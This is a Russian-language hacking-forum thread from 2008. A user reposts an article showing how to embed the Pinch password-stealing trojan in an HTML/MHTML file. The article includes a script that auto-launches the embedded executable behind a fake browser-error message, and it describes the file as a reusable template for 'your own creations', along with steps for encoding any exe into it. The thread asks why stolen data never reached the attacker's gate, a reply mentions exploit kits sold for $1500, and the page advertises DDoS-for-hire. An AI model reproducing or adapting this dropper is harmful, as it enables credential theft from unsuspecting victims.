я нарыл статью как внедрить пинча в хтмл, и как запустит почти любой ехе из хтмл. Попробовал...во время открытия файла хтмл антивирус начал кричать типа в нем есть ПИНЧ троян...я обрадовался...но после как отключил антивир, то так и ничего неполучил....ни в процессах и ни в гейт ничего небыло...почему? Может у кого то получилось?
ВОТ СТАТЬЯ ЦЕЛИКОМ
Сидел я в интернет-клубе, ползал по просторам интернета и решил проверить свой почтовый ящик. Там оказалось недавно пришедшее письмо странного содержания. В начале втирали про что-то на русско-английском языке, а потом такая фраза: "Я слышал, что ты болеешь. Выздоравливай скорее!". Примерно так. Что за чудо, я не болел уже давно. К письму был прикреплен архив, защищенный паролем. А пароль был в тексте письма: docs. В письме говорилось, что в архиве лежат пароли боссов. Опять вирусы, сказал я и принялся обезвреживать бомбу )
Пароль к архиву подошел (так а тож), и передо мной предстал ни вчем не повинный html файлик объемом всего в 15 килобайт. Ну естественно запускать я его не стал, а нажал "F4" (в Total Commander'e). Откылся Блокнот, с содержанием файла docs.html.
MIME-Version: 1.0
Content-Location:file:///Pinch.exe
Content-Transfer-Encoding: base64
[BINARY TEXT VIRUS]
<title>Welcome - Home</title>
<body bgcolor=black scroll=no>
<script>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>Welcome - Home</title><body scroll=no
bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100;
font-size:2cm;">Sorry, Error On This Page! Please Open With Internet
Explorer</center><object style="cursor:cross-hair" alt="Sorry, Error
On This Page! Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666"
CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe"></object>')
}
setTimeout("malware()",150)
</script>
Строка [BINARY TEXT VIRUS] означает, что на этом месте был закодирован exe файл вируса, вставлять я его не стал, уж слишком много места займет. Если тебе важен оригинал вируса, то его можно без проблем скачать от сюда.
Перед вами макет автозапуска виря из html файла. Его можно использовать и для ваших творений ) Просто замените текст [BINARY TEXT VIRUS] на ваш код exe файла. А код можно легко получить следующим образом...
Зайдите в Outlook Express и нажмите "Написать новое сообщение", в открывшемся окне щелкните "Вставка" -> "Вложение файла". Теперь "Файл" -> "Сохранить как...". После сохранения письма, его нужно открыть в Текстовом редакторе и вырезать тот самый код exe файла. И всё!
P.S. За всю мою жизнь, в интернете я подцепил всего лишь ОДНОГО! виря и то не я его нашел, а он меня нашел, и назывался MSBlaster (использующий уязвимость в WinXP - DCOM). Thats All.
Друзья: Всё для вебмастера | [ Реклама на форуме ] |
[ DDos Услуги. DDos атака. Заказать ДДос ] |
0
ПИНЧ в html
Автор
kiberon
, 24 Nov 2008 14:51
#2
Отправлено 25 November 2008 - 03:05
Цитата
ни в процессах и ни в гейт ничего небыло...почему?
p.s: было бы все так просто, не продавали бы связки для браузеров по 1500$
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********
*********
icq:162295
*********
#4
Отправлено 25 November 2008 - 10:43
Количество пользователей, читающих эту тему: 0
0 пользователей, 0 гостей, 0 анонимных